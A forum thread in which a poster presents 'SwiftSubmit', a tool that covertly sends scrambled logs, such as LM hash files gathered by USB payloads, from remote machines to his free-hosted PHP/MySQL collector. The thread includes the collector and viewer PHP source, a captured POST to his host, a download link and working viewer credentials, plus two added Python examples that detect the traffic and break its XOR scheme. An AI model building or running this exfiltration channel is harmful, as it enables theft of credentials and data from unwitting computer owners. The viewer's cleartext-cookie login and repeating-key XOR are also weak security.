
Alternative Method Of Receiving Remote Data


Steve8x

Which Method Is Preferable To You?

3 members have voted

1. Which is your favorite of these three? Emailing, FTPing or PHP+MYSQLing !! ;)

  • HTTP + PHP + MYSQL: 2
  • FTP: 0
  • Email: 1

Recommended Posts

OK, well, I've never used a Hacksaw or a Switchblade (since I prefer to create my own apps).

Anyways, from what I've gathered, your Hack/Blade uses Gmail to receive the log files...

This is bad because you're having to leave your EMAIL and PASSWORD on a remote machine... and I know Gmail, at least back when I made an account, requires that you have a cell phone to create an account, so it's not like you can make that many!

I was using FTP at first for my app, but I still didn't like having to leave a username + password contained within the software!

Here is my better, safer, anonymous method of getting your data. One day I was writing a post here on hak5 when it hit me!

[CLIENT ON REMOTE MACHINE]->FREE WEBSERVER->PHP->MYSQL DATABASE

Think about what I'm doing right now: I'm typing text into a box, and when I click the "Post" button the PHP page that this form data gets submitted to inserts my post into the database... When you have seen my topic and clicked on my post, the text I have posted was fetched from the database and the HTML code was dynamically created by the PHP for your viewing pleasure...

We (non-hak5 admins) have no way of knowing the MySQL database password, and there isn't a reason for us to have it either; we can post data to the database without it...

I have created a sample app, which can be modified for your needs... I'm sure you could get it to post your LM hash files or whatever files Switch/Saw saves to your database!

Here's what you need... Find a free web provider which offers PHP and at least 1 MySQL database, also for free! If you can't find one that offers MySQL you could run your own MySQL database server and find a free host with PHP, and you could still keep your MySQL password hidden... Because of the way PHP works (it's server side), you cannot see the PHP code, only the HTML code generated by it!

THAT'S IT! Once you've got that set up you're ready to receive your data! Make the password a good strong password and change the username from root if you can...

I had to do a little research on the HTTP protocol, and I also used a packet sniffer attached to Firefox while I submitted a form on a website...

My example program is called "SwiftSubmit". It lets you type up to 8000 characters into the box, and once you click submit it sends a packet like this to the host you want it to connect to.

This is all anyone sniffing packets will see: where it's going and other info, but the 'log' data is scrambled!

POST /sendmeyourpackets/index.php HTTP/1.1
Host: popeax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
connection: keep-alive
Referer: http://localhost/pwned.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 346

name=Liz7783&log=.!HuMJUFQL@HPKBH.OJUFQL@[cut]
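What the capture above looks like from the other side of the wire: an added example (not from the original post or the SwiftSubmit code) that parses a form-urlencoded POST the way a proxy or IDS script might and flags fields whose decoded bytes are mostly non-text, which is exactly what XOR output looks like. The request is constructed to match the shape of the capture (the host and the 'log' value are made up, and the request is shorter than the real one); the 15% threshold is an assumption to tune against your own traffic.

```python
"""Flag form-urlencoded POST fields that decode to mostly non-text bytes.

Added example for the SwiftSubmit capture, not code from the original post.
Ordinary form fields (usernames, comment boxes) are printable text; a field
carrying XOR "scrambled" data is full of control and high bytes instead.
"""
from urllib.parse import parse_qsl

# Constructed sample request shaped like the capture in the post; the host and
# the 'log' value are made up for this example.
SAMPLE_REQUEST = (
    "POST /sendmeyourpackets/index.php HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 68\r\n"
    "\r\n"
    "name=Liz7783&log=.%21HuMJ%05UFQL%40H%1FPKBH%00.OJ%7FUFQL%40%01%02%03"
)

# Bytes a human-readable field normally contains: printable ASCII plus tab,
# LF and CR. Everything else counts as "non-text".
TEXT_BYTES = frozenset(range(0x20, 0x7F)) | frozenset((0x09, 0x0A, 0x0D))

# Assumed threshold: 15% non-text bytes in one field. Plain text sits at 0%.
NONTEXT_THRESHOLD = 0.15


def split_request(raw: str):
    """Return (method, path, headers, body) from a raw HTTP/1.1 request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def nontext_ratio(value: bytes) -> float:
    """Fraction of bytes outside the printable-text set (0.0 for empty input)."""
    if not value:
        return 0.0
    return sum(1 for b in value if b not in TEXT_BYTES) / len(value)


def decode_fields(body: str):
    """Decode a form-urlencoded body into {field: raw_bytes}.

    latin-1 maps every %XX escape to exactly one byte, so the scrambled
    payload is recovered unchanged instead of being mangled by UTF-8
    replacement characters.
    """
    pairs = parse_qsl(body, keep_blank_values=True, encoding="latin-1")
    return {name: value.encode("latin-1") for name, value in pairs}


def suspicious_fields(raw_request: str, threshold: float = NONTEXT_THRESHOLD):
    """Return {field: ratio} for POST form fields that look like obfuscated payloads."""
    method, _path, headers, body = split_request(raw_request)
    if method != "POST":
        return {}
    content_type = headers.get("content-type", "")
    if not content_type.startswith("application/x-www-form-urlencoded"):
        return {}
    fields = decode_fields(body)
    return {name: nontext_ratio(value)
            for name, value in fields.items()
            if nontext_ratio(value) >= threshold}


if __name__ == "__main__":
    for field, ratio in suspicious_fields(SAMPLE_REQUEST).items():
        print(f"field {field!r}: {ratio:.0%} non-text bytes, looks obfuscated")
```

Run against the sample, only the 'log' field is reported; 'name' decodes to plain text and stays below the threshold. A real deployment would feed the function request bodies from a proxy log and pair the hit with the destination host, which is the one thing the post says a sniffer does get to see.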

Here's a picture of it, also with the nice little web front in the background I made for it to decode, decrypt and view the logs in the database...

phpSwift.png

As you can see from this picture below of MySQL Query Browser, the data is encrypted in the database itself...

encrypteddata.png

If you're wondering about the names, I like to name all my computers as well as log their IP; it just makes it easier for me... The software randomly chooses a name for the computer it's run on.

Source Code + Binary

http://popeax.com/sendmeyourpackets/SwiftSubmit.zip

Go ahead and test it out on my web server! I can kind of have my own little hak5 wall goin' lol!

You can log in to the web front and see if anyone posted, or see if your post worked!

http://popeax.com/sendmeyourpackets/viewlogs.php -> user: root, password: 1337

SOURCE:

<?php
include('config.php');

// Uses the legacy ext/mysql API (mysql_connect etc.) as posted; that extension is gone in PHP 7+.

if(isset($_POST['auth']))
{
    $user = $_POST['user'];
    $pass = $_POST['pword'];

    // NOTE: the username and password are stored in the cookie in clear text,
    // so anyone who can read the cookie (or the unencrypted HTTP traffic) gets them.
    $logininfo = "$user-$pass";

    setcookie("chocolatechipcookie", $logininfo, time()+1200); // 1200 = 20 minutes

    echo "<meta http-equiv='refresh' content='0;url=$Self'>";
}

if(isset($_COOKIE['chocolatechipcookie'])) // every time you refresh the page you'll stay logged in for 20 minutes
{
    $logininfo = $_COOKIE['chocolatechipcookie'];
    setcookie("chocolatechipcookie", $logininfo, time()+1200);
}

?>

<html>
<head>
<title>Log Viewer v1.0 - by Steve8x</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<center>

<?php

//must change these to be secure so no one can read your logs but you
$USER = "root";
$PASSWORD = "1337";

//very similar to my c++ version
function XORbuffer($buffer, $password)
{
    $passlength = strlen($password);
    $bufflength = strlen($buffer);
    $x = 0;

    for($i = 0; $i < $bufflength; $i++)
    {
        if($x == $passlength)
        {
            $x = 0;
        }

        // byte-wise XOR of one buffer byte with the next password byte (the password repeats)
        $buffer[$i] = $buffer[$i] ^ $password[$x];
        $x++;
    }

    return $buffer;
}

//if no cookie is set, then show the login page
if(!isset($_COOKIE['chocolatechipcookie']))
{
    echo "<h1> Admin Login: </h1>";
    echo "<p><form method='post' action='$Self'>";
    echo "<table border='2' cellspacing='2' cellpadding='0'><tr>";
    echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>";
    echo "<tr><td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>";
    echo "<p> <input type='submit' name='auth' id='auth' value='Login'>";
    echo "</form>";
    die();
}
else
{
    //otherwise validate the username and password stored in the cookie!
    $logininfo = $_COOKIE['chocolatechipcookie'];
    // split() was removed in PHP 7; explode() with a limit of 2 keeps any '-' inside the password
    $parts = explode('-', $logininfo, 2);
    $usr = $parts[0];
    $pass = isset($parts[1]) ? $parts[1] : '';


    //If you enter the wrong username or password you'll have to clear your cookies in your browser
    //it's made that way as an annoyance to deter someone from attempting to guess
    // HOWEVER they shouldn't know about your page anyway...
    if($usr != $USER)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }
    if($pass != $PASSWORD)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }

    echo "<form method=\"post\" action=\"$Self\">";
    echo "<input type=\"submit\" name=\"save\" id=\"save\" value=\"Save Logs To File!\"><p>";
    echo "</form>";


    //let's fetch that data from the database!
    $query = "SELECT * FROM data";
    $result = mysql_query($query);

    $savefile = 0; // only write to disk when the save button was pressed
    if(isset($_POST['save']))
    {
        $savefile = 1;
        $file = fopen("savedlogs.txt", "w");
    }


    echo "<table border='1' cellspacing='1' cellpadding='1'>";
    echo "<tr><th>ID</th><th>Name</th><th>IP</th><th>LOG</th></tr>";

    while($row = mysql_fetch_array($result))
    {
        $id = $row[0];
        $name = $row[1];
        $ip = $row[2];
        $log = $row[3];

        //change the password "hak5liverocks" here and also in your c++ program
        //they have to match so that this page can properly decrypt the stored data
        //the data is always stored encrypted in the database...
        //it's only decrypted when you want to view it!
        //or save it to a text file

        $decoded = urldecode($log);
        $decrypted = XORbuffer($decoded, "hak5liverocks");

        if($savefile == 1)
        {
            $preparedstring = "name-> $name ip-> $ip log-> $decrypted\r\n";
            fwrite($file, $preparedstring);
        }

        // htmlspecialchars() so a log that happens to contain HTML is displayed, not rendered
        echo "<tr><td>";
        echo htmlspecialchars($id);
        echo "</td><td>";
        echo htmlspecialchars($name);
        echo "</td><td>";
        echo htmlspecialchars($ip);
        echo "</td><td>";
        echo htmlspecialchars($decrypted);
        echo "</td></tr>";
    }

    if($savefile == 1)
        fclose($file);

    echo "</table>";
}

?>
</center>
</body>
</html>

http://popeax.com/sendmeyourpackets/index.php

SOURCE:

<?php

include ('config.php'); // opens the MySQL connection that mysql_real_escape_string() needs

if(isset($_POST['name'])) // this means our little program is sending us data :)
{
    $ip = $_SERVER['REMOTE_ADDR'];
    $name = $_POST['name'];
    $log = isset($_POST['log']) ? $_POST['log'] : '';

    // escape quotes so the posted values cannot break out of the INSERT statement
    $name = mysql_real_escape_string($name);
    $log = mysql_real_escape_string($log);

    //insert the encrypted + minimally encoded data into the database!
    $query = "INSERT INTO data (name, ip, log) VALUES ('$name', '$ip', '$log')";
    mysql_query($query);

}
else // otherwise someone's just looking at the page
{
    echo "<center><h1>You Got PWNED!</h1><img src=\"pwned.jpg\"></center>";
}

// the \" are to escape the quotes! in this case you could have also just used single quotes ' '
// but that's not always the case so it's good to know how to escape characters!


?>

config.php

SOURCE:

<?php

$dbhost = 'localhost:3306';
$dbuser = 'nottellingyou';
$dbpass = 'hak5liverocks';
$dbname = 'collecteddata';
// PHP_SELF echoes part of the request URL back into the page, so escape it before it lands in an HTML attribute
$Self = htmlspecialchars($_SERVER['PHP_SELF']);

$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');

$query = "CREATE DATABASE IF NOT EXISTS collecteddata"; // creates the database for you if it doesn't exist yet
$result = mysql_query($query);

mysql_select_db($dbname);

$query = "CREATE TABLE IF NOT EXISTS data(id INT NOT NULL AUTO_INCREMENT, name VARCHAR(30) NOT NULL, ip VARCHAR(30) NOT NULL, log VARCHAR(8000) NOT NULL, PRIMARY KEY(id))"; // create the table if it doesn't exist
mysql_query($query);

?>

Oh, and the XOR encryption used is slightly better than what I've shown before in other topics... Instead of XORing EACH byte of the buffer with EACH character of the password, I only XOR each SUCCESSIVE character of the buffer with each SUCCESSIVE character of the password. This makes it way more secure: the previous method reduced the 'password' to only 1 character; this now requires all characters of the password so the plain text can be revealed.

Well, what do you think, should I keep the encryption? Or just go with encoding? With the encryption not all characters seem to come out exactly the same as when posted; there's something not quite right...

That's not a big deal for text data, but as you can imagine for binary data, or something where every single byte has to be right or it'll be messed up, it's a problem...

So I'm a little confused on how to get this working 100% smooth. Should I encode then encrypt? Or encrypt then encode? lol !!! Right now it's about 95%; I just gotta figure out the encoding bit fully. I probably have to encode more chars than just '&' and spaces... that's probably what's messing up some characters sometimes...

I know one problem though that I dealt with the best I could: the '&' signs... If you encrypt your data and one of those just so happens to be a resulting character after the encryption, that's going to mess up your posted data. It will stop right there, and no more data will be gotten for that field (because it thinks you're declaring data for another field), like "name", "log", etc...

Well, if anyone is good with encoding + encrypting together let me know, and this thing will have perfect 100% readability... If I removed the encryption and just used encoding all the characters would always be readable, but I'd lose the little security provided by it... So I'd rather keep it and figure something out to where the encoding + encrypting can work together! :)
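A check on the two claims above, added here as an example and not part of the post or the SwiftSubmit code: a Python port of the viewer page's XORbuffer() (same byte-for-byte semantics), used to show that the earlier "XOR with every character" scheme collapses to a one-byte key, and that the successive scheme gives up the whole key to anyone who knows, or can guess, a stretch of plaintext as long as the key. The key "hak5liverocks" is the one from the page; the log line, the helper names and the known-plaintext guess are constructed for the example. The practical reading for anyone assessing a database like the one described: treat the stored 'log' column as encoded, not encrypted.

```python
"""Repeating-key XOR as used in viewlogs.php, and why it is not much of a lock.

Added example, not code from the original post. xor_buffer() mirrors the
PHP XORbuffer() exactly; the other helpers are constructed for the demo.
"""
from functools import reduce
from operator import xor

# Key from the page; sample log line and known-plaintext guess are constructed.
KEY = b"hak5liverocks"
SAMPLE_LOG = b"Computer: Liz7783 IP: 192.0.2.10 log: hello world"
GUESSED_PREFIX = b"Computer: Liz"   # 13 bytes, same length as KEY


def xor_buffer(buffer: bytes, password: bytes) -> bytes:
    """Port of XORbuffer(): byte i of the buffer ^ byte (i mod len(password)) of the key."""
    return bytes(b ^ password[i % len(password)] for i, b in enumerate(buffer))


def xor_every_char(buffer: bytes, password: bytes) -> bytes:
    """The older scheme the post mentions: every byte XORed with every key character in turn."""
    out = bytes(buffer)
    for k in password:
        out = bytes(b ^ k for b in out)
    return out


def collapsed_key(password: bytes) -> int:
    """XOR is associative and commutative: x ^ k1 ^ k2 ^ ... == x ^ (k1 ^ k2 ^ ...).

    So the 'every character' scheme is a single-byte XOR, whatever the key length.
    """
    return reduce(xor, password, 0)


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_length: int) -> bytes:
    """Known-plaintext recovery of a repeating XOR key.

    With key_length bytes of plaintext known at a known offset (here offset 0,
    e.g. a fixed log header), key[i] = ciphertext[i] ^ plaintext[i].
    """
    if len(known_plaintext) < key_length:
        raise ValueError("need at least key_length bytes of known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_length], known_plaintext[:key_length]))


def every_char_scheme_collapses() -> bool:
    """True if the old scheme equals a single-byte XOR with the folded key."""
    folded = collapsed_key(KEY)
    return xor_every_char(SAMPLE_LOG, KEY) == bytes(b ^ folded for b in SAMPLE_LOG)


def successive_scheme_leaks_key() -> bool:
    """True if a 13-byte known prefix recovers the full key and decrypts the rest."""
    ciphertext = xor_buffer(SAMPLE_LOG, KEY)
    guessed = recover_key(ciphertext, GUESSED_PREFIX, len(KEY))
    return guessed == KEY and xor_buffer(ciphertext, guessed) == SAMPLE_LOG


if __name__ == "__main__":
    print("old scheme is really a 1-byte XOR:", every_char_scheme_collapses())
    print("new scheme gives up the key to a known prefix:", successive_scheme_leaks_key())
```

The second check is the one that matters for the "way more secure" comparison: once any stored log contains a predictable run of bytes at least as long as the password (the computer name the program picks, a fixed header, a repeated URL), every other row in the database opens with the same key.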


  • 2 weeks later...

Yeah and if you don't understand those tubes can be filled with your encrypted data, and if they are filled and 'posted' to a web page anywhere on the net, then you can process that data on the web page with php for example. What you do with the data from there is up to you. I choose to store it in a database, as I like that way the best.

Since there are free web hosts which offer php + mysql this makes it an ideal method to use...

Enormous amounts of material, enormous amounts of material!! lol ;)
